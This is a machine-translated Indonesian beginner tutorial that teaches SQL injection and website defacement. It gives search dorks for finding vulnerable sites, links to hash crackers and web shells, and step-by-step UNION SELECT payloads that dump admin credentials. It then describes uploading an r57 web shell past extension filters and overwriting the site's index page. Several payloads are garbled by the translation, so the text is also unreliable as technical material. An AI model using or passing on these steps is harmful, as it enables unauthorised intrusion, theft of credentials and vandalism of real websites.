SQL Injection and Defacement For Beginners- Tutorial
1. Apa itu SQL Injection?
SQL Injection adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL.
2. Apakah perusakan?
Sebuah perusakan situs merupakan serangan terhadap sebuah website yang mengubah tampilan visual situs. Ini biasanya kerja kerupuk sistem, yang masuk ke web server dan mengganti host website dengan salah satu dari mereka.
Apa yang Anda butuhkan sebelum Anda mulai dengan SQL Injection.
* Anda harus Admin Finder (untuk menemukan panel admin dari website) *
* Scanner * SQL Injection Rentan
Admin Finder:
http://www.mediafire.com/?0a4aw2gmeohndny
Rentan Scanner:
http://seanstar.000space.com/ &
20scanner% http://newbie.000space.com/sql / atau Anda dapat menggunakan Exploit Scanner.
Dorks untuk Menemukan situs Rentan!:
Common Dorks
inurl: members.php id =?
inurl: page.php id =?
inurl: login.php id =?
inurl: index.php id =?
inurl: register.php id =?
inurl: staff.php id =?
inurl: detail.php id =?
inurl: view.php id =?
MD5 Hash Crackers Online:
http://www.md5crack.com
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://md5.rednoize.com
http://md5decryption.com
http://www.md5decrypter.com
http://passcracking.com
http://md5.my-addr.com/md5_decrypt-md5_c ... r_tool.php
http://www.xmd5.org
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org
Teks untuk Converter ASCII:
http://www.mikezilla.com/exp0012.html?ascii=login&hex =% 2578 & unicode =% 26% 23120;
http://getyourwebsitehere.com/jswb/text_to_ascii.html
Shell:
http://www.kinginfet.net/shells/
Beberapa rentan website
Mulai Tutorial:
1. Pertama anda perlu untuk menemukan website yang rentan.
http://sql-vuln-site.com/index.php?id=15
2. Sekarang Anda perlu mencari kolom.
http://sql-vuln-site.com/index.php?id=15 order 1 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order 2 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 3 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 4 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 5 - (tidak ada kesalahan)
http://sql-vuln-site.com/index.php?id=15 order oleh 6 - (error)
Error terlihat seperti ini:
Anda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan versi MySQL server anda untuk mengetahui sintaks yang hak untuk menggunakan dekat''39 'at line 1
query database kegagalan-SELECT * FROM texecom_sidemenu WHERE id = '39
3. Sekarang Pilih kolom
Kolom adalah 5
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5 -
4. Mencari versi.
Jadi jika Anda tidak berani pergi nomor 1, 2, 3, 4 salah satu dari mereka Anda akan mencoba semua.
Saya memilih 1
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @ @ version, 2,3,4,5 -
Anda mendapat versi seperti ini:
5.0.32-Debian_7etch11-log
5. Menemukan Tabel
UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 nama_tabel, 2,3,4,5 dari information_schema.tables-
Dan anda akan mendapat tabel seperti ini:
PRODUK, ADMINS, dan lain-lain
Jadi harus ada tabel dengan nama: admin, pengguna, pengguna, login, klien.
6. Menemukan Kolom dalam Tabel ADMINS.
UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 nama_kolom, 2,3,4,5 dari information_schema.columns mana nama_tabel = char () -
Kami menemukan ADMINS tabel sekarang pergi ke ASCII web dan mengkonversi ADMINS
Anda akan punya ADMINS
Hapus & # dan ganti, untuk,
Seperti ini: 65,68,77,73,78,83
Anda menempatkan nama_tabel = char (65,68,77,73,78,83) -
UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 nama_kolom, 2,3,4,5 dari information_schema.columns mana nama_tabel = 65,68,77,73,78 char (, 83) -
Dan anda akan mendapat kolom dalam tabel ADMINS
Ada perlu memiliki kolom dengan nama: username dan password
7. Mendapatkan username dan password.
Sekarang kita menaruh concat (username, 0x3a, password) dan admin
UNION ALL SELECT http://sql-vuln-site.com/index.php?id=15 concat (username, 0x3a, password), 2,3,4,5 dari admin-
(0x3a adalah ASCII)
8. Finded username dan password
Jadi Anda menemukan username dan password
jika password hash seperti ini: 2510c39011c5be704182423e3a695e91
Anda akan perlu menggunakan MD5 Hash Online Crackers.
Jika password tidak hash anda beruntung dan sekarang Anda perlu mencari admin panel.
9. Menemukan Admin Panel
Buka alat Admin Finder
Menempatkan website di bawah dan klik Scan.
Jadi Anda menemukan panel admin dan kelihatannya http://sql-vuln-site.com/admin/login.php ini
Anda membuka website dan ada Username: Password:
Masukkan username dan password apa yang Anda punya.
Selesai Anda login di Admin Panel memungkinkan meng-upload shell dan merusak.
10. Meng-upload Shell dan Tambah Merusak
Di Admin Panel Anda akan mencari kategori atau apa pun di mana Anda dapat meng-upload file atau gambar.
Bila Anda ditemukan, Anda akan mendownload shell dari website yang saya memberi tahu Anda sebelum memulai tutorial sehingga Anda akan mencoba untuk meng-upload shell anda seperti: r57.php saat upload itu Anda akan melihat link upload dan buka seperti ini:
http://sql-vuln-site.com/upload/r57.php
Jika tidak dapat meng-upload r57.php mengubahnya ke r57.jpg.php atau r57.txt dan mencoba!
Anda perlu membuat halaman deface di html dan dimasukkan ke dalam website
Jadi anda membuka shell, Anda akan menemukan index.php file dan klik dan disana anda akan menghapus kode php dari indeks dan menaruh kode html Anda.
Selamat Anda deface website.